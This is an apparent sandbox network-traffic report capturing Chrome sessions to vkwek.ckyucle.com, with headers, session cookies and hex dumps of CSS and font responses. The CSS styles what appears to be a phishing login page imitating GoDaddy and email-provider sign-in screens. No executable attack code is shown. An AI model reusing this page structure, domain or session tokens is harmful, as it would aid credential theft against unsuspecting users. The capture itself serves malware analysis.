                                                              2024-07-03 07:41:05 UTC1369INData Raw: 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73 70 61 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 39 29 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64
                                                              Data Ascii: .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>span{color:#fff;width:100%;height:auto;margin:auto;text-align:center;background-color:rgba(0,0,0,.379);padding:15px;border-rad
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 7d 36 35 25 7b 6c 65 66 74 3a 36 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65
                                                              Data Ascii: opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-timing-function:linear}65%{left:60%;animation-timing-function:ease
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c
                                                              Data Ascii: ntainer.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:table-cell;max-width:100%}#sections .sectioncontent{position:rel
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 7d 2e 69 6e 70 75 74 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 23 61 75 74 68 63 61 6c 6c 64 65 73 63 7b 66 6f 6e 74 2d 73 69 7a 65
                                                              Data Ascii: t:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0,.8)}.input::placeholder{font-size:15px}#authcalldesc{font-size
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 32
                                                              Data Ascii: radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.input-group-addon{border-width:2


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.662918188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC1370OUTGET /xy12R7tzrssHzef25 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: text/css,*/*;q=0.1
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: style
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:05 UTC631INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Content-Type: text/css;charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="xy12R7tzrssHzef25"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4keofFMPO2pdYkFVI1B18g6BaoSDWZCvNqZOZv56ByXwOlZYE%2F3cIihUcJl6ANfUnlIe6QDbnHalzB%2FmejbfP%2Fa8TgEzOwQv0edhDYYboYCtCFoY22B%2F8rN0djs4bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b2ce93343be-EWR
                                                              2024-07-03 07:41:05 UTC738INData Raw: 33 37 62 39 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61
                                                              Data Ascii: 37b9@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-fa
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 74 65 73 74 77 65 62 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 2d 73 61 67 65 27
                                                              Data Ascii: : 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage'
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39
                                                              Data Ascii: x-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b
                                                              Data Ascii: padding-inline: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 74 53 69 7a 65 31 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78
                                                              Data Ascii: tSize1) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --ux
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 73 76 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64
                                                              Data Ascii: #sections_godaddy .ux-alert svg { color: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a
                                                              Data Ascii: content: flex-end!important;}#sections_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path:
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a
                                                              Data Ascii: put[type=checkbox] { box-sizing: border-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container:
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6c 65 79 6e 73 6d 2c 23 30 30 30 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 75 78 2d 39 37 68 33 76 6c 2c 23 64 33 64 33 64 33 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65
                                                              Data Ascii: or: var(--ux-1leynsm,#000); border: 1px solid var(--ux-97h3vl,#d3d3d3);}#sections_godaddy .ux-card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-se
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 65 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 6f 37 6a 75 30 68 2c 76 61 72 28 2d 2d 75 78 2d 39 71 70 66 36 63 2c 23 30 30 66 29 29 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 75 71 34 39 70 67 2c 76 61 72 28 2d 2d 75 78 2d 68 36 65 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62
                                                              Data Ascii: e { background-color: var(--ux-o7ju0h,var(--ux-9qpf6c,#00f)); color: var(--ux-uq49pg,var(--ux-h6e7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; b


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.662923188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC1397OUTGET /pqJEZxAGJZqUBhc85R9yzrCUwx40 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://vkwek.ckyucle.com
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: font
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:05 UTC627INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Content-Type: font/woff2
                                                              Content-Length: 28000
                                                              Connection: close
                                                              Content-Disposition: inline; filename="pqJEZxAGJZqUBhc85R9yzrCUwx40"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CrA7jZsDV6yU%2Fcm6w3iWdLAZOO3b2t7WDa9kQ1hZEm531Q7qYZXdeoL0qHm%2F7HNP%2FxtNfbqSAIS0KrmPYHH7tKeB7GVreSoeFn6iNM%2BlOp2MsML%2BfjNH7jv352FPTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b2ced881977-EWR
